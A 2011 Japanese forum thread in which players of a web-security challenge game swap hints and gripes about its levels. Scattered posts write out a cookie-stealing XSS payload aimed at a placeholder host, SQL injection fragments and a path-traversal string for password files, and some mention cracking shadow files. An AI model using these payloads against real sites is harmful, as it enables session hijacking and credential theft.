>>405 なんで試みてみようと思わないの?
違ってたらまた別のやり方でやればいいじゃない?
馬鹿がつられとるw
409 :
名無しさん@お腹いっぱい。:2011/02/24(木) 19:41:11.88
俺lv3突破できないよ
ここに晒されてるのと同じパスだったが・・・
パス変更したそうだから自力でがんばれ
411 :
名無しさん@お腹いっぱい。:2011/02/24(木) 19:44:19.29
>>410 おぉそうかありがと!
突破できるならおk
後から着たががんばってみる
>>411 twitter見ると、ファイルの値が変更されてないから進めんとかいうのあるけど、一応試してみるといいかも
414 :
名無しさん@お腹いっぱい。:2011/02/24(木) 19:47:48.25
>>413 どうやったか言えよ
そっから先は俺が知ってるから
ついにlv4もネタバレが載っちまうのか・・・
416 :
名無しさん@お腹いっぱい。:2011/02/24(木) 19:50:42.47
>>407 試みた。おっけ、出来た。パスはわかった、がIDがわからん
417 :
名無しさん@お腹いっぱい。:2011/02/24(木) 19:52:57.20
>>412 ありがと
確かに出来んかった
ちなみにパスは上のレスと未だに一緒だった
>>416 パスが分かったなら結果に出てると思うよ
なんのパスが分かったのかが
セッションid盗むにしても過去にさかのぼって盗めるこたぁないから
スクリプトがあっていれば何かしら擬似的な反応が返ってくるんだろ?
しかもnetfireサイト上で反応が返ってくるんだろ?
じゃないとサーバー持ってるやつしか解けないよな・・・?
レベル4にログイン履歴なんてあったか?
てかこのログの書き方が悪い気がする、時系列おかしくないか
あれ?Lv3でshadowが見れなくなってる
>>422 まじか!つい数分前は見れたよ
ついに変更されるのか?
セッションID盗めたんなら
>>402の発言はおかしいがなw
本気で言ってんならよく確認しろw
Lv3は辞書でだめだったんで総当たりでやっと見つけて入れたらNG
なんでだ?って思ったらお前らがばらしてたのかよ
どうすんだよこれ・・
でもこのツール、10年位ぶりに使って懐かしかったw
全力でLv3に取り組んでいる中学生。
シャドウファイルまでは行き着いたんだがなぁ・・・・
427 :
名無しさん@お腹いっぱい。:2011/02/24(木) 20:09:34.59
>>426 おまえみたいな頭の悪いガキはいくらでもいるよ
>>424 ほんとだw、sessionidなんだろうけどsessionidじゃなかったw
lv3突破できた!
シャドウファイルが無くなったのはヒントだったのですね
ではlv4へ生かせていただきます!
lv3余裕すぎワロタ
やり直しかよ。ちぇ
門外漢の俺には、lv4で鯖だけは避けたかった。
てか、鯖ってなんだ?鯖側の受け入れ設定とか必要なの?
Lv3変わったって書いてあったから見に行ったら殆ど変わってなくてワロタ
>>434 UNIXいじったことあるなら考える必要もないしね
解法は一緒だし
Lv3ほとんど変わってないwwww変わったことといえばパスワードが適当じゃなくなった感じ
今日でchromeの拡張が2個増えた
何入れたの
UAいじるのとcookieいじるの
UAはいちいち起動オプションに設定するのが面倒だったからいれた
別に釣りではないとおもうけど、ログを最近の状況じゃなくて未来の状況って書いてほしかったw
わかんねーw
UAしかログに残らないのに、そこに正規ユーザーのsessionidを書き込める?
にしてもいやなログイン履歴だな
Lv3がわからない俺は馬鹿なのか・・・。
暗号化されたパスワードはみつけたみたいなんだけど・・・。
446 :
名無しさん@お腹いっぱい。:2011/02/24(木) 21:22:24.08
>>402 おれもセッションIDは盗めたんだけど、使い方がわからんwww
447 :
名無しさん@お腹いっぱい。:2011/02/24(木) 21:24:04.80
使い方教えてやるから盗み方教えて
盗んだとか言ってるやつ、普通に自分のsessionidを盗んだものとか勘違いしてんじゃねえのかw
誰かに踏ませるわけでも無いだろうしどう盗めと。
450 :
名無しさん@お腹いっぱい。:2011/02/24(木) 21:31:53.45
盗めるよ。
俺も
>>449 と同じこと考えてたんだけど、騙されたと思ってやってみ。
直近5件ってもしかして一番下が最新って設定?
というか、誰かLv3のヒントか答え教えてくれ。。。
シャドウファイルは解析しないとだめなのか・・?
shadowファイルが本来の場所にないけどどこにあるんだよ
master.passwd
lv5が不明すぎる
Lv4難しいな
今日のところはこれで勘弁してやるw
>>454 なくなったんだよ
LV4が鯖必要なのかだけでも知りたいな。
さてはLinuxしか使ったことないな
Lv.2がわからねえ
エラーでたが、その後が・・・
464 :
名無しさん@お腹いっぱい。:2011/02/24(木) 21:56:02.40
>>455 改めてlv3やったが、なんぞこれ
修正方向がわからないw
466 :
名無しさん@お腹いっぱい。:2011/02/24(木) 21:58:10.81
そういやLv1。
うちの環境だと右クリック禁止です。って出たあとにコンテキストメニューがでるw
dolpen...
はい…
470 :
名無しさん@お腹いっぱい。:2011/02/24(木) 22:13:57.45
>>466 >>461 がヒントっちゃーヒントになってます。
変な思い込みは捨てて、いろいろやってみると進むかも。
Lv3のヒント教えてクレーorz
今頃スレ読んでるんだけど、
>>405はGUIでやってるんだよな?
GUIは辞書クラックじゃないと駄目
GUIでクラック1回やって成功すると次から出来なくなるので生成されたファイルを削除しないと次が出来なくなる
更に言えば色々不具合あるからDOS画面でやったほうがいい
鯖使わないなら何なんだ・・・知識が無い
LV4なんとなくわかったけど、どうすんだこれ。書き換えできん。
間違ってるだけなのかもしれんが
>>474 よく考えろよ。
お前のセッションIDでhogehogeの奴にログインさせれば良いだろ。
何でこんな低レベルな問題ぐらいでハッカー扱いなのか分からん。
478 :
名無しさん@お腹いっぱい。:2011/02/24(木) 22:35:18.04
>>476 セッション固定攻撃は関係ないよん。
>>477 たしかに、Lv4 までは既によく知られた攻撃方法だからね。
ぜひ、Lv5 一番乗りを目指してください。
479 :
名無しさん@お腹いっぱい。:2011/02/24(木) 22:37:03.63
>>474 自鯖使うの? でも、それって無理じゃね? ・・・って言う発想は
(方向性としては)合ってる。
Lv4 難しそう・・・
Lv5はこの会社の製品テストか
時間の無駄だった
解けてないけど直近5件のログイン状況っていう文字列が勘違いさせられてる原因な気がする
483 :
名無しさん@お腹いっぱい。:2011/02/24(木) 22:45:18.26
>>482 ログイン状況は、かなりデカいヒントだよ。
だって、今まであんなのなかったでしょ?www
Lv5は成功者が出ないうちは考え始めないほうが生産性高そう。
裏はGAEだから製品プロモではないにしても、広告PV増やすためのダミーな気が…
URLの「Lv4/?」の?って意味あんのかなーとか、alertって入れた時しか「スクリプトが実行可能なようです」って出ないけどそうじゃない場合は全部無効なのかなーとか色々気になる
Lv3までは簡単だがLv4からはどうなのだろう
487 :
名無しさん@お腹いっぱい。:2011/02/24(木) 22:52:29.94
/ / ',. \ ヽ
/ / ;. ,,,,, ヽ )
{ ./ ', ,,.'''" `ヽ 彡
! i ' , ,,,,, ,r''(・)ヽ 彡
i ミ 〃 ゙゙゙゙'' ′.`"´,/ ヾ.
. ', ( ,r'(・ )`'ヽ `'''''" !
', 彡 `"´ ノ } ゝ { もっと答えちょうだい〜
', 〆、ミ ー- ''" ( ,、_ッ^′ i
'{ ⌒ ,,___,. / .}
\ i、 -‐"ニ' i´ / ノ
i Uヽ ,,,,ノ i /
\,,,ノi \ {./
「スクリプトが実行可能なようです」は、苦肉の策だろうから、額面どおりに受け取ってあげてくれ。
だって意味わかんねえじゃん
なんでalertだけ通るんだよ
そんな情況ありえないだろ
alert通る状態って実際ならやり放題的な状況な気がするんだけど
全然コードが通らなくてなんかもやもやする
(´・ω・`)LV2からむりなんだわ
>>490 やっ、まあそれはそうなんだけどさwww
あくまで、Hackme の脆弱性は、人工的に作られた脆弱性。
そんな事いったら、Lv2 で本来なら間違いなく通るはずのSQLを散々叩いて
あげく、それをチョロッと変形させただけの「出題者が期待するSQL」がスルッと
通って、若干ムカついた俺のような奴も居るわけで・・・。
Lv2はよくあるインジェクションに一手間加えれば通るよな
きっちりエスケープもされるし
同意
不正解です!とかはっきり出してくれればいいのに
UAにスクリプトしこんどくっていうのは違う?
>>491 これは本当にそう思う。
alert 通るなら・・・
こう書いたら、こう言う動きになる ⇒ あれ? ならねえ。
ってのが普通にあるからな。
だから、色々試してみて、ちょっとずつ間合いを積めるってのがやり難い。
ある程度(こう言う脆弱性があるんだろうと言う)正解の道筋が見えてないと
厳しいね。
lv3 50人ちょっと通過したか
今日の0時は150人もいなかったのにな
スクリプトが実行可能なようですw
なら実行させさせてくれよw
作者の想定した方法しか通らないからなw
単体だと正常にエンティティ化される→脆弱性ないと判断
が、組み合わせるとエンティティ化されずに通るとか罠すぎる。
スクリプトが実行可能なようですってどう出すの?
てかUAにスクリプトって仕込めるのか?
>>493 若干とは優しいな・・
せめてどんなSQL想定してるかは決めておかないと
徐々に構造を明らかにしていく楽しみがないわー
何故かlike検索にするとか、もちょいひねり方はあっただろうに
>>499 これ見る感じ方向性はあっているみたいで安心した
しばらく続けるわ
XSSを踏んだhogehogeがsessionidを露出させるようなスクリプト?そんなの知らねえー
Lv2突破した人に聞きたいんだけど、普通のSQLインジェクションが通らない理由は
ちゃんとあるの?それとも作者の用意したパターンに合致しない限り駄目なだけ?
>>508 エスケープがきちんとされてるとしたら通らない理由もわかると思う
>>508 残念ながら「作者の用意したパターンに合致しない限り駄目」です。
とは言っても、そこまでイヤらしいもんじゃないので、色々やってればクリアできるんじゃないかな。
いつの間にかLv3クリアした人が600人超えてたww
どっかのアホがIDとPW公開したから増えたんだよ
513 :
名無しさん@お腹いっぱい。:2011/02/24(木) 23:35:08.26
本物の脆弱性を仕込んでほしいなー
ユーザ毎にサンドボックスみたいなの用意するのは無理なのかしら
>>505 確かに、徐々に構造を明らかに・・・ってのは、その通りだと思う。
けど、それを本気でやろうとしたらSQLパーサを作んなきゃいけない訳で。
それはかなりダルいよなぁと思う。
>>509 だいたいにしてあんなに綺麗に「こちらの入力した文字列だけ」が
エラーとして表示されるわけはないので
そこで解析の思考が止まってしまうんだよなー
すでにありえない敵を相手してる前提になってしまう
517 :
名無しさん@お腹いっぱい。:2011/02/24(木) 23:39:05.97
ぶっちゃけこういうことがしたいのにGAEなんかで実装してる時点で企業の力量が知れるわなww
このスレのやつらが本気で作ったらもっとすごいのができそうだなw
<script>document.location="httpp://xxx.xxx/?cookie="+document.cookie</script>
も通らないなー
lv4はどういうコード書けばいいの?
どっかに転送させるの?その場に表示させるの?
>>520 それに答えちゃうと、そのまま正解になってしまう・・・ってのがヒント。
変な置換処理の所為で一向に進まねえ!
>>517 短期的なキャンペーンにクラウド使うのは、良くある事だと思うんだけど。
力量が知れる理由を教えて。
>>519 だから外部鯖はいらんといってるだろ。ログ見たのかよ。
1911
>>517 どんなリソースを使うかはリスクやらコストやらの問題だろ。
仮に本物の凄腕ハッカーが来たとしても相手するのはgoogleだし、
ネットファイアは蜂に刺された程度の痛みしかないしね。
>>523 お、中の人か?
lv2、lv4の問題見れば、「力量が知れる」と言った意味がわかるだろう
別に普通のWEBアプリにGAE使うなって言ってるわけじゃないよ
<script>alert(document.cookie)</script>
なぜ↑が効かないんだ〜〜〜〜
社員張り付きすぎワロタ
>>528 それ表示されるのは自分のクッキーだろ。
何だこのスレ、素人しかいないのか?
532 :
名無しさん@お腹いっぱい。:2011/02/24(木) 23:52:25.70
>>528 それが効いたとしても自分の cookie の値がわかるだけじゃね?
533 :
名無しさん@お腹いっぱい。:2011/02/24(木) 23:53:29.39
528フルボッコワロタ
時系列上から下だよな多分
とはいっても、これに挑戦している人は9万人越えらしいが実際にLv3クリアして増してやLv4もクリアした人はかなり少ないんだな。
テスト方法として
>>528みたいなことを試す人はいるだろw
自鯖使わずにhogehogeのsessionidとやらを抜き出す方法なんてどう考えても思いつかん。UAってjavascriptで変えられるのか?
LV4はなんだ
決まった処理じゃないとscriptの内容消されるのか
>>538 UA変える方法は、いくらでもあるでしょ?
541 :
名無しさん@お腹いっぱい。:2011/02/25(金) 00:01:46.18
LV4 のログって上と下どっちが新しいの?
>>541 多分下。じゃないと何もできないと思う。
>>541 上だよ。これを踏まえればログが何を意図してるかが分かる。
foobarがログイン中ってことだ
こう書いたらこうなってこうなります。ってのがあるんだろうな
って上なのかよ。
風婆め、そのセッションをこっちによこせと
Lv4も9割方ネタバレされてるからまたメンテ入りそうだなw
549 :
名無しさん@お腹いっぱい。:2011/02/25(金) 00:09:02.78
やっとLv4クリア
でも、これはちょっとおかしいよな
まぁ脱出ゲームみたいなもんか
>>548 の割にはランキングが増えないね。
つーか、Lv5・・・。
Lv5・・・。
できねぇ・・・。どうやったらいけるか?
552 :
名無しさん@お腹いっぱい。:2011/02/25(金) 00:11:21.48
やっぱ上かー。
そうなると foobar のセッションをジャックするしかないと思うんだけど、でも foobar はすでにログインしてるんだからログのページにスクリプト仕組んだところで見に来なくね?
問題がクソな気がしてならない
>>552 そう思っていた時期が俺にもありました。
lv4は作成者が問題よくないって言ってたからなww
独自解釈で上が最新のログとした後に自分のログを一番したにもっててかつログインできてないのに
先にセッションつくっちゃうクソwebアプリとして考えたw
日本語でおk
Foobarさんはログイン成功したのに成功画面リロードしてるお茶目さん。
UAに<script>〜</script>を書くだけの簡単なお仕事
561 :
名無しさん@お腹いっぱい。:2011/02/25(金) 00:18:57.21
確かに問題が「クソ」かもしれない
でもこの辺りが落とし所なのかもとも思うね
Lv4はIE6.0ってのもヒント?
563 :
名無しさん@お腹いっぱい。:2011/02/25(金) 00:24:29.06
>562
お、いい感じ 64bitもポイント
なんでも鵜呑みにするのは危険
IDでないしw
Lv2がどうしてもわからん
括弧でくくってあることを考えて') Or ('a'='aとか
定数が先でフィールドが後になっているのかと思ってa'='a' Or 'とかやっても駄目だし
このありえないエラー表示から何を読み取ればいいのよ
じゃ俺はTrident/4.0。
てかyoutube見てたらいっぱいhackのやり方のせてる奴らいるから見てみればいい。
xss hackとか。がんばれー
>>566 俺と同じところでひっかかったな
あのSQLはSQLインジェクション対策にSQLの最後に未知の処理が仕込んであって異常を検出してる
>>567 ええと・・・エスケープされたらSQLエラーにはならないんじゃ・・・
とっとと Lv4 をクリアして、Lv5 包囲網を作ってほしい。
Lv4のヒントください
おれはLv5のキッカケが知りたい
>>569 えーLv2ってインジェクションじゃないの?それは意外だった
もうでょい考えてみるか・・・
>>570 ヒントあんがと
gzip(gfe),gzip(gfe),・・・
ヘルプ
>>573 あれだけのヒントが与えられてXSSを思い付かないのならムリ
ネタバレを待て
>>579 いや、それ答えだからw
答えをそのまま打ち込んでも楽しくないでしょうよw
lv4クリアしたひとの中で誰か
lv5いけるようにした捨てアカウント
さらしてくれませんか?
このプロモーションは有効だな
セキュリティなんてどんだけ口うまいやつが風呂敷広げるかだからな
つーか、9万人以上参加してんのに、Lv5 クリアした奴が一人も居ないとかどうなってんの!?
>>582 お、新しいね
でもLv4の方が為にはなるぜ、Let's google
ここだけの話、lv4をクリアしたひとはいない
理由はlv2の時、lv3の話をした内容を思い出せばわかるよ
ヒント:そいつらは全員lv3はxssだと言っていたw
>>586 Lv3を見てxssというヤツは素人では
でもLv4クリアした人は増えてるから正解も混ざってる
LV4 をクリアするよりも LV4 をクリアしたやつらのアカウントを奪う方が簡単だったりしてなw
LV4できた ちょっと笑ったわ
>>590 多分簡単だが、やったら不正アクセスで手が後ろに回るわw
document.write('sessionid教えてください');
でいけたわ
****さんの称号は、「ハッカー」です。なかなか。
やりますね。でも、もしセキュリティ関係者だったらこの位は普通でしょ?
続きから再開する
そのうちに会社で遊んでるのがバレちゃうかも
フィルタ対象になってしまうかも..
>>595 ちょっと前までLv3でその称号だったのにー
ネタバレするヤツがいるから降格だよ
検索能力もハッキングの一つか...
>>586 おれ途中からだが、素直にlv3まで解いたよ
3lvでパスが通らなかったから2chに来た
その後変更されたから3lv通って今lv4やってる
gzipってなんだよー
というかLv5ってあるの?
にょきって出てくるアレならちょっと笑った
>>600 できればわかる
色々ちゃんと用意したのが馬鹿みたいだわ
そうかXSRFか
もしかしてga.jsからクッキー(ry
LV5の手掛かりのなさは異常
というかLV4までの露骨な手掛かりが異常だった
ちょっと見ない間にたまごたちが増えてるけど
ネタバレ中なの?
Lv3までならセキュリティ関連の情報を検索すれば自力でできるぜ
Lv4はちょっと無理すじ
>>599 gzip?んなもん関係ない。
無視しろ
>>599 ごめんなさい、gzip はジョークです。
>>599 俺もgzipが怪しいと思ってるが、どうも進まない
UAにクッキー詰めてログインに飛ばしても駄目なのか
もうどうしろと
>>603 そんなに短いのか。
ちゃんと現実的に動くコードなのか怪しいな。
>>607 確かにww レベルが進むごとに、なんか変なの追加されてんぞ状態。
Lv5 解ける気がしない
もう少しゲームとして楽しめるようにしてほしい
Lv4を説いたっていう人沢山いるけど
21時頃からランキングに一人も追加されてないのはなんで?
login.htmになんかスクリプト投げればいいのか?
>>617 解いた直後に書いたら誰が書き込んだか判るだろw
>>617 昼頃は中の人合わせて6人なのに今は・・・
そうかjsessionidか、なるほど
フラクタルはじまっちゃったお
フラクタルの中にLv4の答えあるかな?
夜になると帰宅する奴もいるだろう
今の50人ほどは素直に解いたものだと思う
>>566だがようやくLv2通ったわ。ヒントくれた人たちありがとう。
だがしかし定数「1」がTrueと見なされないのは正直頭おかしいと思う。
lv4の新しいヒントをくれ
ua,xss,scriptとかそう言うのはもうヒント貰う前に通り過ぎてそっからがわからん
あきらメロン。どうせLv3もネタバレで解いたクチでしょう
629 :
名無しさん@お腹いっぱい。:2011/02/25(金) 01:07:19.69
gzipはGAE使ってるとなぜかUAにくっつくんだよ
理由は全くわからん
>>629 どうもそこがヒントらしいのだが...
おいらももう少し調べてみる
gzip使ってるからだよ
>>631 そうか、というこてはIDとパスワードをzipして
あそこに設定すればいいのか、試してみよう
Lv1から進めないんですけど、どうすればいいのでしょうか?
>>635 読売オンラインの記事をコピペするところから始めるべき
それはSQLの仕様じゃないか
誰でもクリアできるもんではないよ。
Lv4はヒント貰っても元々それなりに知識ある人じゃないとクリアできん。
スレ内で9割方ネタバレされてるけどクリア者あまり増えてないだろ?
lv4は以前のlv2と同じような感じらしいので修正くるまで待ち
一字一句揃えて云々とかアホらしすぎる
まぁ、確かに そうかもしれん
lv5がわからねーというかほとんどみんなやってないんだろうなlv4ぐらいで愛想つかして
>>606 この垢ランキングに載ってるんだけどパスは?
Lv1とか、ソースコード見れれば簡単だろ。
つーか、中学生すらLv3クリアしてるのに大人ができないとかw
>>640 一字一句ってほど酷くはないよ。
よくある攻撃例をやれば通るかと。
たぶん多くの人が試してるスクリプトは弾くようなコーディングをしてる奴が
スクリプトの埋め込みを許すようなことなんてそもそもあり得ないだろ
ググるだけで簡単にできるようなのはらめぇ って意図なんだろうか
セキュ板に居て、こんなスレ見てるのにLv1解けないのはどうしょうもないよなw
>>645 これは大人だからとい問題ではないだろう
ソースコードというのはhtmlファイルのこと?
年齢は関係ないだろ、なにもしないのはバカだとはおもうが
そういやアノサイトまだあるのかな?
クリックやらソースやらTABやら反転やら駆使してどんどんページを進んでいく凄く古くにあったサイト
やっぱみんなLv4で詰まってんのな
スクリプト書いても弾かれるだけだしなぁ・・
一字一句は微妙に違う気がするけどまぁ酷いのは確か
1LVの答え Yahooの知恵袋で晒されてたよな。
今は使えるか知らんけど
>>645 どんだけ中学生アピールしたいんだよwww
言っとくけどこれらの問題は超ポピュラーだからな?解けない方がおかしい
その頃は俺もexeアンパックして解析とかしてたな
闇プログラマの中学生がいると聞いて
>>650 そう思うなら試してみろよ・・・
やりもしないでごちゃごちゃと
あ、なんとなくわかったかも
仮に自鯖があるとおもって書いてみろ
>>655 よっぽど複雑じゃない限りUnpackとか簡単だろw
つか、何歳だよw
../../etc/security/passwd/tcb/auth/files/r/root
これくらいにしとけばきっとLv3の価値がもっとですね
ソース見るのは2000年ちょいくらいの時期には既にあったからなぁ
年齢自慢したいならRubyのコミッタになるぐらいしないと
こんなのは所詮ゲームの域を出ないよ
このスレにいるやつら口は悪かいも知れないがイイヤツだな
アクセスしていていい感じだ
とりあえずハム速から来た奴は死んでくれよ
年は自慢したくねーーーー
そろそろ介護保険...
>>660 お前には馴染みが薄いかもしれんがデバッグした事あるか?x86のアセンブリわかるか?今は本当にハックするのに便利な環境だからな
>>666 すまんハム速でHackmeのこと知ったわ。Lv4クリアしてるから勘弁してくれ。
あっ、Lv4解けた
技術的というより、作者の考えに近づけるのに時間がかかったよ
>>647 ググるだけで簡単に出来てしまったんだが。
ある程度の基礎知識(よくある攻撃方法)を広く浅く知っていれば
あとはググって出てきたサンプル通りやれば出来ると思う。
でも,LV1はある意味ノーヒントだから難しく考えて詰まる奴は多いと思う
Webアプリケーションセキュリティに詳しくない奴ほど早そう
hirarin0110さん乙
>>659 これを信じて突き進めばLv4はクリアできる。
>>669 x86のアセンブリわかって何が嬉しい、じいさん? はぁ
なんか急に伸びだしてるな
何で?
いいからはやくLv5解けよ
>>669 もちろんあるが?
x86アセンブリも大体わかる。
本当に今のご時勢はクラッキングしやすくなったよねぇ
>>673 そういう意味で言うと、Lv2もノーヒントだと思うけど
攻撃手法が有名だからLv2なんかな。
Lv4クリア済みの奴で協力してLv5攻略すべき
中学生君よりスキル低いと思うけど、
あんまり中学生って事をアピールしない方が良いよ。
なんでって、年取ってから思い出すと恥ずかしかったりする。
まあそれだけだな。
,. -‐'''''""¨¨¨ヽ
(.___,,,... -ァァフ| あ…ありのまま 今 起こった事を話すぜ!
|i i| }! }} //|
|l、{ j} /,,ィ//| 『アクセスログを見ようとワクテカしてたら
i|:!ヾ、_ノ/ u {:}//ヘ ブラウザが動き出したた』
|リ u' } ,ノ _,!V,ハ |
/´fト、_{ル{,ィ'eラ , タ人 な… 何を言ってるのか わからねーと思うが
/' ヾ|宀| {´,)⌒`/ |<ヽトiゝ おれも何をされたのかわからなかった
,゙ / )ヽ iLレ u' | | ヾlトハ〉
|/_/ ハ !ニ⊇ '/:} V:::::ヽ 頭がどうにかなりそうだった…
// 二二二7'T'' /u' __ /:::::::/`ヽ
/'´r -―一ァ‐゙T´ '"´ /::::/-‐ \ sessionidとかCSRFだとか
/ // 广¨´ /' /:::::/´ ̄`ヽ ⌒ヽ そんなチャチなもんじゃあ 断じてねえ
ノ ' / ノ:::::`ー-、___/:::::// ヽ }
_/`丶 /:::::::::::::::::::::::::: ̄`ー-{:::... イ もっと恐ろしいものの片鱗を味わったぜ…
>>672 LV4そんなことなくない?よくある例は通らない印象
よくある例は通らなかったけど自分がいつも使う方法に変えたら通った
lv4は自分がしたいことを至極簡潔に書けば問題ないけど
>>682 いやいや、自演じゃないしww マジで信じてみなって。
そしたら >602 の意味が分かるよ。
先生!
ずばりLV4はdocument.cookieの文字は含めますか!?
>>686 自分流でやってみたら全然通らなくて、ググってコピペしたら通ったんだ。
正直、なんじゃそりゃーと思ったが、まあしょうがない。
ところでランキングの名前表示順てどうなってるんだろうなこれ
明らかにクリア日時じゃないけどアルファベットでもないし
かといってランダムでもないし
アカウントID順だろうか
リアル厨二病が居てわろた。
いつか大人になってわかると思うから何も言うまい。
Don't think、feeeeeeeeeeeeeeeeeel!
ふぅ・・・
IDに通し番号でも振ってあるんでしょ
アカウント作成順(id順)だろ
hackmeなんてもの夜中にやるもんじゃなくて
昼間にやるもんだぜ、それぐらいの余裕が無いとな
fuck me
>>606 使えたんだけど、Lv5意味不明すぎる。
Lv4 ってブラウザ依存してたりする?
Safari でやってんだけど、どうもスクリプトが実行されないんだよな。
lv5やってみたが所見穴なしだった。
俺は新世界のログインページをひと目みれて満足した。
あとはお前達に託した。
>>704 たぶん攻撃手法自体について何か勘違いをしている
>>704 これが実際の脆弱性じゃなくて、脆弱性をエミュレートしたものだって判ってるか?
不正解な場合は命令は実行されない
Lv2のSQLも実際にSQL発行していないのはエラーメッセージから明らか
あーもうやめた
lv4は10種以上、別鯖いらずの成功するパターン試したのに駄目とかやってらんね
こんなあほらしいセキュリティの為のパース処理とかねぇよ
>>704 攻撃はいくつかのステップに分かれるが、ステップ1はブラウザ依存ないはず。
ステップ2以降は、俺は(アドオン目的で)Firefoxでやった。
鯖は「いるけどいらない」
>>708 逆に考えるんだ。
別鯖いらずの方法で散々試してもダメという事は・・・。
別鯖に送る方法何種かやったけど
別鯖の方しか見てなかったがもしかして見逃してるのか・・
いつもの惑わし
つーか、こんだけヒント出てんのに解けないとかどういう事。
XSSって言葉の意味すら知らんのかね。
>>708 俺も同じ意見だ。なんかアホらしくなってきた。
「スクリプトが実行可能なようです」で他のalert通らないとか
なんかやらされてる感ぷんぷんで萎える。
まあ、それでも色々試してみたんですけどね。
作者の意図を理解しなきゃ次に進めないとかパズルゲーム以下で面白くないわ
example.comでいいとかそういうオチじゃねえよな?
>>715 そう思うのは時期尚早だぞ。
Lv2 は確かにパズルゲー的だったけど、Lv4 に関してはアプリケーションが何の脆弱性を
抱えているか分かれば、後は教科書通りのやり方でクリアできる。
こういうのはセキュ板に居る奴だけでひっそりやるのが楽しいのに
ブログとかから無知なカスが沸いてくるのがマジうぜぇわ
教科書通りにやるなら、UAに
<script>document.location="htpp://xxx.xxx/?cookie="+document.cookie</script>
を書いて終了なはず。
教科書?どこが教科書通りなんだよ
脆弱性はxss
スクリプトが通ると言う前提で行われてるテストだろ
なのに1種しか通らないとかアホらしくて物がいえん
googleの懸賞のほうがまだマシだわ
Lv5の手がかり掴めた人いる?
>>721 そう思ってるうちは解けない
まあ理不尽な気もするけど
正解したらどこに表示が出るのかだけでも知りたい
理論上は仕込んでからしばらく時間を置かないと見えないはずだけど
即反映されてログイン直後の画面に出てくるの?
>>721 合ってるよ。あとは成りすましをすれば良い。
>>724 具体的にどう理不尽なのか教えて
通常じゃありえねーだろっていうことが起こるの?
>>725 遷移後の画面(履歴が5件表示される画面)にすぐ反映される。
>>728 ありがとう
もうちょい他の方法探してみる
なんかもうLV4もほぼネタバレ祭り状態だな
こんなんじゃ週末にはLV4クリア200人超えとかするんじゃないか
もーちょいLv4のヒントくれ、頼むわ
理不尽さを少しは補完してくれ
>>730 頑張れ。正解したら「えぇぇぇww」ってなると思う。
コード貼っちゃう人とかちょっと大人気ないんじゃないかなー
課程には理不尽さはないはず。結果の出方が面白いだけで
>>732 正直、ヒントはこのスレで出尽くしているんで、これ以上は無理だわ。
なんかlv4の正解見たらキレるんじゃないかって気がしてきたわ・・・
>>731 俺的には1000人越えくらいして、総力戦でレベル5に挑みたいわ。
>>737 そんな事はないと思う。
一番萎えたのはLv2。Lv4は、まあまあ順当だと思う。
Lv4クリアochinkoより
Javascriptビジュアル・リファレンス改訂版P228に答えが載ってる
やりかたは絶対あってるはずなんだよ。
だけど正解が見つからないだけなんだよ。
だから誰かもう答え教えてくれ。
>>742 思い込み。
ぐだぐだネタバレに近いものを書くヒマがあったら試そう。
はあ また具体的なネタバレかよ
直接書かないだけマシだけどわざわざ名前書くとことか最高にダサい
>>742 分かるwww 多分、もう少しだぞ。がんばれ。
>>744 どうせ本持ってなきゃ無理だし本には答えの1/3くらいしか実際には書いてない
747 :
730:2011/02/25(金) 02:49:30.05
えぇぇぇww
解けた…嘘だろ…
なんで完全一致しかダメなんだよ…嘘だろ…
おめww
感想を書いてくれ。
それが俺達のヒントになる。
完全一致だと・・・何そのクソゲー
Hackmeはゲームとしては面白いけど,公式アカウントとか何考えてるんだろう
どう考えても今のままじゃビジネスモデルとして成立しないと思うんだけど
ユーザが増えなきゃ宣伝にはならないし,ユーザが増えたらネタバレだって増えるんだし
え、完全一致じゃないとだめなの?
ためしてくる!
>>755 完全一致と聞いて逆にヤル気が起きてるお前を尊敬する。
完全一致…
まじかよ…
locationぶっ飛ばし系でいいのか?
つかjqueryじゃないだろうな
てかajaxで飛ばしてるんだからニョロンってなれよ…
俺の2日間嘘だろ…
>>756 いや、じゃなくて。
全然完全一致じゃないじゃん。。。手法は今のとこ1通りしか見つけてないけど、書き方はいろいろできる。
* *
* うそです +
n ∧_∧ n
+ (ヨ(* ´∀`)E)
Y Y *
location
src
href
これらのうちどれかを使うのかだけ教えてくれ
挙動が同じであっても特定のワードが揃わないとリジェクトされるみたい。
嘘だろ…
eeeeee
まじでかw
>>765 それはLv2で体験済みだろwww
だから、出来るだけ「良くある書き方」から試していくんだ。
うわこれはひどいwww
確かに
>>602がすべてだったwww
常識を問われているわけですねわかります
うげぇ
ふざけんな…
ブラウザ依存考慮してのアレなんだろうが、別にアレでもいいだろうが…
cookieからnameを拾って内部でそのまま表示させてると仮定
別鯖経由させないならこの手法でロギング出来るので…
document.cookie='name='+document.cookie;location.reload();
とか色々やってた俺は何なんだよ!
まじうぜぇwwwwwwwwwwww
他にもeval,xhr,iframe,ajaxやら何やら色々ためしたぞ、糞がwwwwwwww
答えとかヒント聞く奴は結局ヒントだけでここまできて,何も理解してないだろ
少なくともLV4まではちゃんと調べればなんとかなるぞ
問題は正解でもいいんじゃないかってのが通らない場合があるってことだけ
>>773 >問題は正解でもいいんじゃないかってのが通らない場合があるってことだけ
それがクソなんだよ
>>773 いや、lv4は酷い
まさに一字一句じゃねぇか
考えかがあってるけどテキスト違いますとかほんと苛つく
まぁもうクリアしたから別にいいけどな…
もうむりwww
>>772 あんた、、相当色々な事をやってたんだな。
>>772 ご苦労さんwww
でも document.cookie='name='+document.cookie; は通らないんじゃない?
ログインに飛ばすとか
飛んだらばれるから非同期で送るとか散々やったのにこの仕打ち
Lv4そんなに酷いかな? 上のほうにも出てたけど、教科書的じゃない?
そろそろLv4の話も出尽くしたし、次いこうぜ…
あれですか?この程度のものじゃ破れないだろう?って先入観で、
もっと小難しいことやると通らないって事ですか?
Lv4 40文字でいけたよ
とりあえずコード張り付けるのはやめようよ
Lv5手がかり全然無いよな・・・
>>779 ちょい前のへっぽこサービスだとログイン後に名前をcookieに保持させる事があるだろう
毎回dbに問い合わせてusername取ってくるちょいアレなシステムの負荷低減のためにさ
それを想定したのよ
まぁしかしこりゃまたほんとに基本だったわwww
んじゃlv5を覗いてみるか…
>>783 ログイン後のページのソース(HTML)をエディタか何かで保存して
>>776 のソースを適当な場所に挿入してみたら分かるんじゃない?
Lv5の答えはあなたのGoogleアカウントです
Lv5が完璧に見えるんだが、なんかヒントないのか。
791 :
785:2011/02/25(金) 03:16:54.89
>>774 本来正解となりえないものが正解になるわけだが、そこもやっぱりクソな点だよな
あー、でもLv4の問題が理不尽だったおかげで色んな回り道は覚えたな・・
Lv4のにょきっ!にビビったwww
